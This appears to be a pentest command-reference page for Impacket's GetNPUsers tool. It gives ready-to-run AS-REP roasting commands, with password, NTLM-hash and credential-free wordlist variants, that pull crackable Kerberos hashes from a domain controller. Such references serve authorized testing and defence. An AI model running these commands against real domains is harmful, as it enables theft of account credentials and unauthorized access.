Impacket AS-REP Roast

AS-REP Roasting for accounts without Kerberos Pre-Authentication

Tool
impacket-GetNPUsers
Category
Credential Attacks / Kerberoasting
Platform
linux
Requires
password
Protocols
KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-GetNPUsers -dc-ip <ip> -request -outputfile hashes.asreproast '<domain>/<user>:<password>'

Credential variants

The same attack using a different authentication material.

No Creds (user list) requires no credentials

impacket-GetNPUsers -dc-ip <ip> -request -outputfile hashes.asreproast '<domain>/' -usersfile <wordlist>

NTLM Hash requires NTLM hash

impacket-GetNPUsers -dc-ip <ip> -request -outputfile hashes.asreproast -hashes ':<hash>' '<domain>/<user>'

Examples

impacket-GetNPUsers -dc-ip 192.168.1.100 -request -outputfile hashes.asreproast 'CORP/user:password'
impacket-GetNPUsers -dc-ip 192.168.1.100 -request -outputfile hashes.asreproast 'CORP/' -usersfile users.txt

Tags

impacket asreproast kerberos hash

References